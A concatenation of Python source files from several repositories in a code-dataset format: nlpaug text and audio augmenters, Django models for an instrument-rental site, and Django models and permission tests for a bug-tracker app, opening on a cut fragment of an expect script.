lan.expect(r'443/tcp.*?open', timeout=100)
lan.expect(prompt)
``` |
{
"source": "joaoantonioverdade/nlpaug",
"score": 3
} |
#### File: augmenter/audio/audio_augmenter.py
```python
from nlpaug.util import Method
from nlpaug import Augmenter
class AudioAugmenter(Augmenter):
def __init__(self, action, name='Audio_Aug', verbose=0):
super(AudioAugmenter, self).__init__(
name=name, method=Method.AUDIO, action=action, aug_min=1, verbose=verbose)
def substitute(self, data):
return self.model.manipulate(data)
```
#### File: augmenter/word/fasttext.py
```python
from nlpaug.augmenter.word import WordEmbsAugmenter
from nlpaug.util import Action
import nlpaug.model.word_embs as nmw
from nlpaug.util.decorator.deprecation import deprecated
FASTTEXT_MODEL = {}
def init_fasttext_model(model_path, force_reload=False):
"""
Load model once at runtime
"""
global FASTTEXT_MODEL
if FASTTEXT_MODEL and not force_reload:
return FASTTEXT_MODEL
fasttext = nmw.Fasttext()
fasttext.read(model_path)
FASTTEXT_MODEL = fasttext
return FASTTEXT_MODEL
@deprecated(deprecate_from='0.0.7', deprecate_to='0.0.9', msg="Use WordEmbsAug from 0.0.7 version")
class FasttextAug(WordEmbsAugmenter):
"""
Augmenter that leverage fasttext's embeddings to find top n similar word for augmentation.
:param str model_path: Downloaded model directory. Either model_path or model is must be provided
:param obj model: Pre-loaded model
:param str action: Either 'insert or 'substitute'. If value is 'insert', a new word will be injected to random
position according to word embeddings calculation. If value is 'substitute', word will be replaced according
to word embeddings calculation
:param int aug_min: Minimum number of word will be augmented.
:param float aug_p: Percentage of word will be augmented.
:param int aug_n: Top n similar word for lucky draw
:param list stopwords: List of words which will be skipped from augment operation.
:param func tokenizer: Customize tokenization process
:param func reverse_tokenizer: Customize reverse of tokenization process
:param bool force_reload: If True, model will be loaded every time while it takes longer time for initialization.
:param str name: Name of this augmenter
>>> import nlpaug.augmenter.word as naw
>>> aug = naw.FasttextAug()
"""
def __init__(self, model_path='.', model=None, action=Action.SUBSTITUTE,
name='Fasttext_Aug', aug_min=1, aug_p=0.3, aug_n=5, stopwords=None,
tokenizer=None, reverse_tokenizer=None, force_reload=False,
verbose=0):
super().__init__(
model_path=model_path, aug_n=aug_n,
action=action, name=name, aug_p=aug_p, aug_min=aug_min, stopwords=stopwords,
tokenizer=tokenizer, reverse_tokenizer=reverse_tokenizer, verbose=verbose)
if model is None:
self.model = self.get_model(force_reload=force_reload)
else:
self.model = model
def get_model(self, force_reload=False):
return init_fasttext_model(self.model_path, force_reload)
```
#### File: model/lang_models/gpt2.py
```python
try:
import torch
from pytorch_transformers import GPT2Tokenizer, GPT2LMHeadModel
except ImportError:
# No installation required if not using this function
pass
from nlpaug.model.lang_models import LanguageModels
from nlpaug.util.selection.filtering import *
class Gpt2(LanguageModels):
SUBWORD_PREFIX = 'Ġ'
def __init__(self, model_path='gpt2', top_k=None, top_p=None, device=None):
super().__init__(device, top_k=top_k, top_p=top_p)
self.model_path = model_path
self.tokenizer = GPT2Tokenizer.from_pretrained(model_path)
self.model = GPT2LMHeadModel.from_pretrained(model_path)
self.model.to(device)
self.model.eval()
def id2token(self, _id):
return self.tokenizer.decode(_id, clean_up_tokenization_spaces=True).strip()
def predict(self, text, target_word=None, top_n=5):
# Convert feature
input_idxes = self.tokenizer.encode(text)
input_idxes = torch.tensor(input_idxes, device=self.device).unsqueeze(0).repeat(1, 1)
# Prediction
with torch.no_grad():
outputs = self.model(input_idxes)
target_token_logits = outputs[0][0][-1] # GPT2 only predict last token
# Filtering
if self.top_k is not None and 0 < self.top_k < len(target_token_logits):
target_token_logits, target_token_idxes = filter_top_n(
target_token_logits, top_n + self.top_k, -float('Inf'))
if self.top_p is not None and 0 < self.top_p < 1:
target_token_logits, target_token_idxes = filter_cum_proba(target_token_logits, self.top_p)
# Generate candidates
candidate_ids, candidate_probas = self.prob_multinomial(target_token_logits, top_n=top_n + 10)
results = self.get_candidiates(candidate_ids, candidate_probas, target_word, top_n)
return results
```
#### File: model/spectrogram/spectrogram.py
```python
class Spectrogram:
def mask(self, data):
raise NotImplementedError()
```
#### File: model/word_stats/word_statistics.py
```python
import numpy as np
class WordStatistics:
def __init__(self, cache=True):
self.cache = cache
def train(self, data):
raise NotImplementedError()
def predict(self, data, top_n):
raise NotImplementedError()
def save(self, model_path):
raise NotImplementedError()
def read(self, model_path):
raise NotImplementedError()
@classmethod
def choice(cls, x, p, size=1):
return np.random.choice(len(x), size, p=p)
``` |
{
"source": "JoaoAPS/AlugaInstrumentos",
"score": 2
} |
#### File: backend/categorias/models.py
```python
from django.db import models
class Categoria(models.Model):
"""Categoria que um equipamento pode ter"""
name = models.CharField('nome', max_length=64)
is_instrument = models.BooleanField()
def __str__(self):
return self.name
def __repr__(self):
return "<Categoria: " + str(self) + '>'
```
#### File: equipamentos/tests/conftest.py
```python
import pytest
from django.urls import reverse
from equipamentos.models import Equipamento
from categorias.models import Categoria
@pytest.fixture
def list_url():
return reverse('equipamento-list')
@pytest.fixture
def detail_url():
def get_url(equip_id):
return reverse('equipamento-detail', args=[equip_id])
return get_url
@pytest.fixture
def equipamento(db, tmp_image):
cat = Categoria.objects.create(name='Test Cat', is_instrument=True)
equip = Equipamento.objects.create(
title='Test Equip',
description='lorem ipsum',
price_per_day=1.00,
is_instrument=True,
image=tmp_image.name
)
equip.categorias.add(cat)
return equip
```
#### File: backend/users/models.py
```python
from django.db import models
from django.contrib.auth.models import BaseUserManager, AbstractBaseUser
from django.contrib.auth.models import PermissionsMixin
class UserManager(BaseUserManager):
def create_user(self, email: str, name: str, password: str):
"""Create and save a new user"""
user = self.model(email=email, name=name)
user.set_password(password)
user.save(using=self._db)
return user
def create_superuser(self, email: str, name: str, password: str):
"""Create and save a new superuser"""
user = self.create_user(email=email, name=name, password=password)
user.is_admin = True
user.save(using=self._db)
return user
class User(AbstractBaseUser, PermissionsMixin):
email = models.EmailField(max_length=255, unique=True)
name = models.CharField(max_length=255)
is_active = models.BooleanField(default=True)
is_admin = models.BooleanField(default=False)
objects = UserManager()
USERNAME_FIELD = 'email'
REQUIRED_FIELDS = ['name']
def __str__(self):
return self.email
@property
def is_staff(self):
"""Is the user a member of staff?"""
return self.is_admin
def has_perm(self, perm, obj=None):
"Does the user have a specific permission?"
return True
def has_module_perms(self, app_label):
"Does the user have permissions to view the app `app_label`?"
return True
``` |
{
"source": "JoaoAPS/BugTracker",
"score": 2
} |
#### File: app/bugs/models.py
```python
from django.db import models
from django.contrib.auth import get_user_model
from projects.models import Project
class Bug(models.Model):
"""A bug in a project to be fixed"""
POSSIBLE_STATUS = ['BEING WORKED', 'WAITING', 'FIXED', 'CLOSED']
ACTIVE_STATUS = ['WAITING', 'BEING WORKED']
WORKING_STATUS = 'BEING WORKED'
WAITING_STATUS = 'WAITING'
STATUS_CLASSES = {
'WAITING': 'warning',
'BEING WORKED': 'primary',
'FIXED': 'success',
'CLOSED': 'danger'
}
title = models.CharField(max_length=255)
description = models.TextField(blank=True)
_status = models.CharField(max_length=15, default='WAITING')
creationDate = models.DateTimeField(auto_now_add=True)
closingDate = models.DateTimeField(null=True, blank=True, default=None)
project = models.ForeignKey(
Project, on_delete=models.CASCADE, related_name='bugs'
)
creator = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE, related_name='created_bugs'
)
assigned_members = models.ManyToManyField(
get_user_model(), related_name='assigned_bugs', blank=True
)
@property
def status(self):
return self._status
def set_status(self, status):
"""Set the status of the bug checking for valid status"""
if status not in self.POSSIBLE_STATUS:
possibleVals = str(self.POSSIBLE_STATUS).strip('[]')
raise ValueError(
'Bug status must be one of the following: ' + possibleVals
)
self._status = status
@property
def status_tuples(self):
"""A list of tuples containing the status and its bootstrap class"""
return [(s, self.STATUS_CLASSES[s]) for s in self.POSSIBLE_STATUS]
@classmethod
def get_active(cls):
"""Return a queryset with the active bugs"""
return cls.objects.filter(_status__in=cls.ACTIVE_STATUS)
def __str__(self):
"""Return the string representation of the bug object"""
return self.title
__repr__ = __str__
class Message(models.Model):
"""A message written on the bug board"""
writer = models.ForeignKey(
get_user_model(), on_delete=models.CASCADE, related_name='messages'
)
bug = models.ForeignKey(
Bug, on_delete=models.CASCADE, related_name='messages'
)
creationDate = models.DateTimeField(auto_now_add=True)
content = models.TextField()
def __str__(self):
"""Return the string representation of the message object"""
result = self.writer.get_short_name() + ' - ' + self.content
if len(result) > 32:
result = result[:29] + '...'
return result
__repr__ = __str__
```
#### File: bugs/tests/test_views.py
```python
import datetime
from django.test import TestCase, Client
from django.urls import reverse
from core import utils
from bugs.models import Bug, Message
class TestBugViewsPermissions(TestCase):
"""Test the bug views permission"""
def setUp(self):
self.client = Client()
self.member = utils.sample_member()
self.creator = utils.sample_member(email="<EMAIL>")
self.superuser = utils.sample_superuser()
self.project = utils.sample_project()
self.project.members.add(self.creator)
self.bug = utils.sample_bug(creator=self.creator, project=self.project)
self.list_url = reverse('bugs:list')
self.detail_url = reverse('bugs:detail', args=[self.bug.id])
self.create_url = reverse('bugs:create')
self.update_url = reverse('bugs:update', args=[self.bug.id])
self.creator_update_url = reverse(
'bugs:creator_update', args=[self.bug.id]
)
self.assign_member_url = reverse(
'bugs:assign_member', args=[self.bug.id]
)
self.change_status_url = reverse(
'bugs:change_status', args=[self.bug.id]
)
self.change_working_status_url = reverse(
'bugs:change_working_status', args=[self.bug.id]
)
self.bugPayload = {'title': 'Tmp', 'project': self.project.id}
def test_unauthenticaded_requests(self):
"""Test the bug views for unauthenticated requests"""
for url in [
self.list_url,
self.detail_url,
self.create_url,
self.update_url,
self.creator_update_url,
]:
res = self.client.get(url)
redirect_url = res.url.split('?')[0]
self.assertEqual(res.status_code, 302)
self.assertEqual(redirect_url, reverse('members:login'))
for url in [
self.create_url,
self.update_url,
self.creator_update_url,
self.assign_member_url,
self.change_status_url,
self.change_working_status_url,
]:
res = self.client.post(url)
redirect_url = res.url.split('?')[0]
self.assertEqual(res.status_code, 302)
self.assertEqual(redirect_url, reverse('members:login'))
def test_superuser_requests(self):
"""Test the bug views for superuser requests"""
self.client.force_login(self.superuser)
for url in [
self.list_url,
self.detail_url,
self.create_url,
self.update_url,
self.creator_update_url,
]:
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
for url in [
self.create_url,
self.update_url,
self.creator_update_url,
self.assign_member_url,
self.change_status_url,
self.change_working_status_url,
]:
res = self.client.post(url)
self.assertNotIn(res.status_code, [404, 403, 302])
def test_project_supervisor_requests(self):
"""Test the bug views for project supervisors requests"""
self.project.members.add(self.member)
self.project.supervisors.add(self.member)
self.client.force_login(self.member)
for url in [
self.list_url,
self.detail_url,
self.create_url,
self.update_url,
]:
res = self.client.get(url)
self.assertEqual(res.status_code, 200)
for url in [
self.create_url,
self.update_url,
self.assign_member_url,
self.change_status_url,
self.change_working_status_url,
]:
res = self.client.post(url)
self.assertNotIn(res.status_code, [404, 403, 302])
def test_project_member_requests(self):
"""Test the bug views for project members requests"""
self.project.members.add(self.member)
self.client.force_login(self.member)
res = self.client.get(self.list_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.create_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.get(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.create_url)
self.assertNotIn(res.status_code, [404, 403, 302])
res = self.client.post(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.assign_member_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_working_status_url)
self.assertEqual(res.status_code, 403)
def test_non_project_member_requests(self):
"""Test the bug views for project members requests"""
self.client.force_login(self.member)
res = self.client.get(self.list_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 403)
res = self.client.get(self.create_url)
self.assertEqual(res.status_code, 200)
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.get(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.create_url, self.bugPayload)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.creator_update_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.assign_member_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 403)
res = self.client.post(self.change_working_status_url)
self.assertEqual(res.status_code, 403)
def test_assigned_member_requests(self):
"""Test the bug views for requests from members assigned to the bug"""
res = self.client.post(self.change_working_status_url, {'starting': 1})
self.assertEqual(res.status_code, 302)
class TestBugListView(TestCase):
"""Test the bug list view"""
def setUp(self):
self.list_url = reverse('bugs:list')
self.member = utils.sample_member()
self.project = utils.sample_project(creator=self.member)
self.client = Client()
self.client.force_login(self.member)
def test_bug_list_GET_only(self):
"""Test only GET requests are allowed for list view"""
res = self.client.post(self.list_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.list_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.list_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.list_url)
self.assertEqual(res.status_code, 405)
def test_bug_list_empty_list(self):
"""Test the bug list view when the bug list is empty"""
res = self.client.get(self.list_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/list.html')
self.assertFalse(res.context['bugs'].exists())
self.assertContains(res, 'No bugs found')
def test_bug_list_basic(self):
"""Test the bug list for a basic request"""
b1 = utils.sample_bug(
creator=self.member, project=self.project, title="Bug c"
)
b2 = utils.sample_bug(
creator=self.member, project=self.project, title="Bug a"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug d",
_status="FIXED"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug b",
_status="CLOSED"
)
res = self.client.get(self.list_url)
queryset = Bug.objects.filter(id__in=[b1.id, b2.id])
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/list.html')
self.assertQuerysetEqual(
res.context['bugs'],
[repr(bug) for bug in queryset.order_by('-creationDate')]
)
def test_bug_list_show_inactive(self):
"""Test the bug list for a request showing inactive bugs"""
utils.sample_bug(
creator=self.member, project=self.project, title="Bug c"
)
utils.sample_bug(
creator=self.member, project=self.project, title="Bug a"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug d",
_status="FIXED"
)
utils.sample_bug(
creator=self.member,
project=self.project,
title="Bug b",
_status="CLOSED"
)
queryset = Bug.objects.all().order_by('-creationDate')
res = self.client.get(self.list_url + '?show_inactive=1')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/list.html')
self.assertQuerysetEqual(
res.context['bugs'],
[repr(bug) for bug in queryset],
)
class TestBugDetailView(TestCase):
"""Test the bug detail view"""
def setUp(self):
self.superuser = utils.sample_superuser(email='<EMAIL>')
self.supervisor = utils.sample_member(email='<EMAIL>')
self.creator = utils.sample_member(email='<EMAIL>')
self.assigned = utils.sample_member(email='<EMAIL>')
self.member = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project(creator=self.supervisor)
self.project.members.add(self.supervisor)
self.project.members.add(self.creator)
self.project.members.add(self.assigned)
self.project.members.add(self.member)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(creator=self.creator, project=self.project)
self.bug.assigned_members.add(self.assigned)
self.client = Client()
self.detail_url = reverse('bugs:detail', args=[self.bug.id])
def test_bug_detail_only_GET(self):
"""Test only GET requests are allowed for the bug detail view"""
self.client.force_login(self.supervisor)
res = self.client.post(self.detail_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.detail_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.detail_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.detail_url)
self.assertEqual(res.status_code, 405)
def test_bug_detail_404_on_nonexisting_bug(self):
"""Test trying to access a non existing bug returns a 404"""
self.client.force_login(self.supervisor)
nonexisting_url = reverse('bugs:detail', args=[9876])
res = self.client.get(nonexisting_url)
self.assertEqual(res.status_code, 404)
def test_bug_detail_successful_request(self):
"""Test a succesful request returns all necessary components"""
self.client.force_login(self.supervisor)
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/detail.html')
self.assertEqual(res.context['bug'], self.bug)
self.assertContains(res, self.bug.title)
self.assertContains(res, self.bug.description)
self.assertContains(res, str.title(self.bug.status))
def test_bug_detail_work_on_bug_button_for_assigned_only(self):
"""Test the 'Work on bug' button only appears for assigned members"""
self.bug.set_status(self.bug.WAITING_STATUS)
self.client.force_login(self.assigned)
res = self.client.get(self.detail_url)
self.assertContains(res, 'Work on bug')
self.client.force_login(self.member)
res = self.client.get(self.detail_url)
self.assertNotContains(res, 'Work on bug')
def test_bug_detail_assign_member_button_for_supervisors_only(self):
"""Test the 'Assign member' button only appears for supervisors"""
self.client.force_login(self.superuser)
res = self.client.get(self.detail_url)
self.assertContains(res, 'Assign a member')
self.client.force_login(self.supervisor)
res = self.client.get(self.detail_url)
self.assertContains(res, 'Assign a member')
self.client.force_login(self.assigned)
res = self.client.get(self.detail_url)
self.assertNotContains(res, 'Assign a member')
self.client.force_login(self.member)
res = self.client.get(self.detail_url)
self.assertNotContains(res, 'Assign a member')
def test_bug_detail_messages(self):
"""Test the bug messages are correctly passed to context"""
self.client.force_login(self.member)
other_bug = utils.sample_bug(
creator=self.supervisor, project=self.project
)
Message.objects.create(
content="Mess 5", bug=self.bug, writer=self.member
)
Message.objects.create(
content="Mess 2", bug=self.bug, writer=self.member
)
Message.objects.create(
content="Mess 1", bug=self.bug, writer=self.superuser
)
Message.objects.create(
content="Mess 4", bug=self.bug, writer=self.supervisor
)
Message.objects.create(
content="Mess 14", bug=other_bug, writer=self.member
)
Message.objects.create(
content="Mess 13", bug=other_bug, writer=self.member
)
messages = Message.objects\
.filter(bug=self.bug).order_by('-creationDate')
res = self.client.get(self.detail_url)
self.assertEqual(res.status_code, 200)
self.assertEqual(list(res.context['messages']), list(messages))
class TestBugCreateView(TestCase):
"""Test the bug create view"""
def setUp(self):
self.member = utils.sample_member()
self.project = utils.sample_project(creator=self.member)
self.project.members.add(self.member)
self.client = Client()
self.client.force_login(self.member)
self.create_url = reverse('bugs:create')
def test_bug_create_view_GET_POST_PUT_only(self):
"""Test only GET, POST and PUT requests are allowed to create view"""
res = self.client.patch(self.create_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.create_url)
self.assertEqual(res.status_code, 405)
def test_bug_create_view_GET_basic_successful(self):
"""Test GETting create view with no optinal parameters"""
res = self.client.get(self.create_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/create.html')
self.assertContains(res, 'Title')
self.assertContains(res, 'Description')
self.assertContains(res, 'Project')
def test_bug_create_view_GET_default_project_successful(self):
"""Test GETting create view with optinal parameters"""
res = self.client.get(self.create_url + f'?project={self.project.id}')
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/create.html')
self.assertContains(res, 'Title')
self.assertContains(res, 'Description')
self.assertContains(res, 'Project')
def test_bug_create_view_POST_successful(self):
"""Test a bug is created when a valid request is made to create view"""
res = self.client.post(self.create_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
'project': self.project.id
})
self.assertEqual(res.status_code, 302)
self.assertTrue(Bug.objects.filter(title='Bug Title 123').exists())
def test_bug_create_view_sets_creator_and_date_automatically(self):
"""Test the bug creator and creation date are set automatically"""
res = self.client.post(self.create_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
'project': self.project.id
})
self.assertEqual(res.status_code, 302)
bug = Bug.objects.get(title='Bug Title 123')
self.assertEqual(bug.creator, self.member)
self.assertEqual(bug.creationDate.date(), datetime.date.today())
def test_bug_create_view_missing_field(self):
"""Test a missing required field returns an error"""
res = self.client.post(self.create_url, {
'description': 'A bug description',
'project': self.project.id
})
self.assertEqual(res.status_code, 200)
self.assertFalse(
Bug.objects.filter(description='A bug description').exists()
)
res = self.client.post(self.create_url, {
'title': 'Bug Title 456',
'description': 'A bug description',
})
self.assertEqual(res.status_code, 200)
self.assertFalse(
Bug.objects.filter(title='Bug Title 456').exists()
)
def test_bug_create_view_invalid_project(self):
"""Test an invalid project returns an error"""
res = self.client.post(self.create_url, {
'title': 'Bug Title 456',
'description': 'A bug description',
'project': 123
})
self.assertEqual(res.status_code, 200)
self.assertFalse(
Bug.objects.filter(title='Bug Title 456').exists()
)
class TestBugUpdateView(TestCase):
"""Test the bug update view"""
def setUp(self):
self.member = utils.sample_member()
self.project = utils.sample_project(creator=self.member)
self.project.members.add(self.member)
self.project.supervisors.add(self.member)
self.bug = utils.sample_bug(creator=self.member, project=self.project)
self.client = Client()
self.client.force_login(self.member)
self.update_url = reverse('bugs:update', args=[self.bug.id])
def test_bug_update_view_no_DELETE(self):
"""Test DELETE requests are not allowed to update view"""
res = self.client.delete(self.update_url)
self.assertEqual(res.status_code, 405)
def test_bug_update_view_GET(self):
"""Test GETting update view with no optinal parameters"""
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/update.html')
self.assertContains(res, 'Title')
self.assertContains(res, self.bug.title)
self.assertContains(res, 'Description')
self.assertContains(res, self.bug.description)
def test_bug_update_view_POST_successful(self):
"""Test a bug is updated when a valid request is made to update view"""
res = self.client.post(self.update_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.title, 'Bug Title 123')
self.assertEqual(self.bug.description, 'A bug description')
class TestBugCreatorUpdateView(TestCase):
"""Test the bug creator_update view"""
def setUp(self):
self.creator = utils.sample_member()
self.project = utils.sample_project()
self.project.members.add(self.creator)
self.bug = utils.sample_bug(creator=self.creator, project=self.project)
self.client = Client()
self.client.force_login(self.creator)
self.update_url = reverse('bugs:creator_update', args=[self.bug.id])
def test_bug_creator_update_view_creator_allowed(self):
"""Test the bug creator can access the creator_update view"""
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 200)
res = self.client.post(self.update_url)
self.assertNotEqual(res.status_code, 403)
def test_bug_creator_update_view_no_DELETE(self):
"""Test DELETE requests are not allowed to update view"""
res = self.client.delete(self.update_url)
self.assertEqual(res.status_code, 405)
def test_bug_creator_update_view_GET(self):
"""Test GETting update view with no optinal parameters"""
res = self.client.get(self.update_url)
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'bugs/creator_update.html')
self.assertContains(res, 'Title')
self.assertContains(res, self.bug.title)
self.assertContains(res, 'Description')
self.assertContains(res, self.bug.description)
def test_bug_creator_update_view_POST_successful(self):
"""Test a bug is updated when a valid request is made to update view"""
res = self.client.post(self.update_url, {
'title': 'Bug Title 123',
'description': 'A bug description',
})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.title, 'Bug Title 123')
self.assertEqual(self.bug.description, 'A bug description')
class TestBugAssignMemberView(TestCase):
"""Test the bug AssignMember view"""
def setUp(self):
self.member = utils.sample_member(email='<EMAIL>')
self.supervisor = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project()
self.project.members.add(self.member)
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(creator=self.member, project=self.project)
self.client = Client()
self.client.force_login(self.supervisor)
self.assign_member_url = reverse(
'bugs:assign_member', args=[self.bug.id]
)
def test_bug_assign_member_view_POST_only(self):
"""Test the bug 'assign_member' view only accepts POST requests"""
res = self.client.get(self.assign_member_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.assign_member_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.assign_member_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.assign_member_url)
self.assertEqual(res.status_code, 405)
def test_bug_assign_member_view_succeful(self):
"""Test the bug 'assign_member' can successfully assign member"""
m1 = utils.sample_member(email='<EMAIL>')
m2 = utils.sample_member(email='<EMAIL>')
self.project.members.add(m1)
self.project.members.add(m2)
res1 = self.client.post(
self.assign_member_url, {'member_ids': [str(self.member.id)]}
)
res2 = self.client.post(
self.assign_member_url, {'member_ids': [m1.id, m2.id]}
)
self.assertEqual(res1.status_code, 302)
self.assertEqual(res2.status_code, 302)
self.assertIn(self.member, self.bug.assigned_members.all())
self.assertIn(m1, self.bug.assigned_members.all())
self.assertIn(m2, self.bug.assigned_members.all())
def test_bug_assign_member_view_errors(self):
"""Test the bug 'assign_member' view raises errors when needed"""
non_project_member = utils.sample_member(email='<EMAIL>')
res = self.client.post(self.assign_member_url)
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
res = self.client.post(self.assign_member_url, {'member_ids': 1})
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
res = self.client.post(self.assign_member_url, {'member_ids': [2165]})
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
res = self.client.post(
self.assign_member_url, {'member_ids': non_project_member.id}
)
self.assertEqual(res.status_code, 400)
self.assertFalse(self.bug.assigned_members.exists())
class TestBugChangeStatusView(TestCase):
"""Test the bug ChangeStatus view"""
def setUp(self):
self.supervisor = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project()
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(
creator=self.supervisor, project=self.project
)
self.bug.set_status(self.bug.WAITING_STATUS)
self.client = Client()
self.client.force_login(self.supervisor)
self.change_status_url = reverse(
'bugs:change_status', args=[self.bug.id]
)
def test_bug_change_status_view_POST_only(self):
"""Test the bug 'change_status' view accepts only POST requests"""
res = self.client.get(self.change_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.change_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.change_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.change_status_url)
self.assertEqual(res.status_code, 405)
def test_bug_change_status_view_successful(self):
"""Test the bug 'change_status' view succesfully changes bug status"""
res = self.client.post(self.change_status_url, {'status': 'FIXED'})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.status, 'FIXED')
self.assertEqual(self.bug.closingDate.date(), datetime.date.today())
def test_bug_change_status_view_error(self):
"""Test the bug 'change_status' view raises errors when needed"""
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(
self.change_status_url, {'status': 'nonexistent_status'}
)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(self.change_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
class TestBugChangeWorkingStatusView(TestCase):
"""Test the bug ChangeWorkingStatus view"""
def setUp(self):
self.supervisor = utils.sample_member(email='<EMAIL>')
self.project = utils.sample_project()
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(
creator=self.supervisor, project=self.project
)
self.bug.set_status(self.bug.WAITING_STATUS)
self.client = Client()
self.client.force_login(self.supervisor)
self.change_working_status_url = reverse(
'bugs:change_working_status', args=[self.bug.id]
)
def test_bug_change_working_status_view_POST_only(self):
"""Test bug 'change_working_status' view accepts only POST requests"""
res = self.client.get(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.patch(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.put(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
res = self.client.delete(self.change_working_status_url)
self.assertEqual(res.status_code, 405)
def test_bug_change_working_status_view_successful(self):
"""Test bug 'change_working_status' view succesfully changes status"""
res = self.client.post(self.change_working_status_url, {'starting': 1})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.status, self.bug.WORKING_STATUS)
res = self.client.post(self.change_working_status_url, {'starting': 0})
self.bug.refresh_from_db()
self.assertEqual(res.status_code, 302)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
def test_bug_change_working_status_view_error(self):
"""Test bug 'change_working_status' view raises errors when needed"""
res = self.client.post(self.change_working_status_url)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
res = self.client.post(
self.change_working_status_url, {'starting': 'wrong'}
)
self.assertEqual(res.status_code, 400)
self.assertEqual(self.bug.status, self.bug.WAITING_STATUS)
class TestMessageViews(TestCase):
"""Test the views involving bug messages"""
def setUp(self):
self.superuser = utils.sample_superuser()
self.supervisor = utils.sample_member(email="<EMAIL>")
self.member = utils.sample_member()
self.non_member = utils.sample_member(email="<EMAIL>")
self.project = utils.sample_project(creator=self.supervisor)
self.project.members.add(self.member)
self.project.members.add(self.supervisor)
self.project.supervisors.add(self.supervisor)
self.bug = utils.sample_bug(
creator=self.superuser, project=self.project
)
self.client = Client()
self.message_create_url = reverse(
'bugs:create_message', args=[self.bug.id]
)
def test_message_create_view_only_POST_allowed(self):
"""Test the message create view only accepts POST requests"""
self.client.force_login(self.superuser)
res = self.client.post(self.message_create_url)
self.assertNotEqual(res.status_code, 405)
for method in ['get', 'put', 'patch', 'delete']:
res = getattr(self.client, method)(self.message_create_url)
self.assertEqual(res.status_code, 405)
def test_message_create_view_permissions(self):
"""Test the permission for the create_message view are correct"""
res = self.client.post(self.message_create_url)
self.assertRedirects(
res,
reverse('members:login') +
